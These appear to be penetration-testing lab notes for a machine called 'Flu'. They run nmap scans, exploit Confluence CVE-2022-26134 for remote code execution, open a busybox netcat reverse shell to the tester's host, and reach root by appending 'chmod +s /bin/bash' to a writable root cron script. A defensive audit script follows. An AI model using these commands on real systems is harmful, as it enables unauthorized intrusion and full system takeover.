Flu

Enum

sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP 
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP

Services

22 ssh
8090 confluence

Public exploit

GitHub - nxtexploit/CVE-2022-26134: Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE)

💡
Try at least 4 exploit pocs before moving on.
➜  CVE-2022-26134 git:(main) python3 CVE-2022-26134.py http://192.168.245.41:8090 whoami
Confluence target version: 7.13.6
confluence
➜  CVE-2022-26134 git:(main)

YOOO

💡
ALWAYS USE BUSYBOX NETCAT
python3 CVE-2022-26134.py http://192.168.245.41:8090 'busybox nc 192.168.45.171 22 -e sh'

Local

881eb6ca6cbaf31eb219c17c23d10ed2

Ran pspy, found backup

2024/08/11 16:41:01 CMD: UID=0     PID=3061   | /usr/sbin/CRON -f -P 
2024/08/11 16:41:01 CMD: UID=0     PID=3062   | /bin/bash /opt/log-backup.sh 
2024/08/11 16:41:01 CMD: UID=0     PID=3063   | /bin/bash /opt/log-backup.sh 
2024/08/11 16:41:01 CMD: UID=0     PID=3065   | tar -czf /root/backup/log_backup_20240811164101.tar.gz /root/backup/log_backup_20240811164101 
2024/08/11 16:41:01 CMD: UID=0     PID=3066   | tar -czf /root/backup/log_backup_20240811164101.tar.gz /root/backup/log_backup_20240811164101 
2024/08/11 16:41:01 CMD: UID=0     PID=3067   | 
2024/08/11 16:41:01 CMD: UID=0     PID=3068   | 
2024/08/11 16:41:01 CMD: UID=0     PID=3069   | 
2024/08/11 16:41:01 CMD: UID=0     PID=3070   | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ; 
2024/08/11 16:41:06 CMD: UID=0     PID=3071   | 

We can echo into it

echo "chmod +s /bin/bash" >> log-backup.sh

We wait and can exec!

/bin/bash -p

proof:

4b230a2820e2be2549a9d3469cd70b11
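
The root cause of the escalation above is a root cron script that a non-root user could append to. As an added example (not part of the original notes), this sketch pulls the scripts that UID 0 runs out of pspy-style lines and checks the owner and write bits of each script and its directory. The function names `root_scripts` and `audit_path` and the UID=1001 sample line are made up for illustration.

```bash
#!/bin/sh
# Added example (not from the original notes): audit scripts that root runs.

# Constructed sample in the same format as the pspy output above.
SAMPLE_PSPY='2024/08/11 16:41:01 CMD: UID=0     PID=3062   | /bin/bash /opt/log-backup.sh
2024/08/11 16:41:01 CMD: UID=1001  PID=3100   | /bin/bash /home/user/job.sh
2024/08/11 16:41:01 CMD: UID=0     PID=3067   | '

# Read pspy lines on stdin; print each script that UID 0 ran through a shell.
root_scripts() {
  awk -F'[|] ' '/CMD: UID=0 / {
    n = split($2, a, " ")
    if (n >= 2 && a[1] ~ /\/(ba|da)?sh$/ && a[2] ~ /^\//) print a[2]
  }' | sort -u
}

# audit_path FILE [OWNER_UID]: exit 0 if FILE and its directory are owned by
# OWNER_UID (default 0) and not group/world-writable, 1 on a finding,
# 2 if the path cannot be read. Runs in a subshell so variables stay local.
audit_path() (
  want=${2:-0}; rc=0
  for p in "$1" "$(dirname -- "$1")"; do
    info=$(ls -ldnL -- "$p" 2>/dev/null) || exit 2
    mode=${info%% *}
    uid=$(printf '%s\n' "$info" | awk '{print $3}')
    case $mode in
      ?????w*|????????w*) writable=yes ;;   # group or other write bit set
      *) writable=no ;;
    esac
    if [ "$uid" != "$want" ] || [ "$writable" = yes ]; then
      echo "FINDING mode=$mode uid=$uid $p"; rc=1
    fi
  done
  exit $rc
)

# Demo: audit every root-run script named in the sample.
printf '%s\n' "$SAMPLE_PSPY" | root_scripts | while read -r s; do
  audit_path "$s" || echo "review $s (status $?)"
done
```

The directory check matters because write access to the containing directory allows the script to be replaced even when the file itself is read-only.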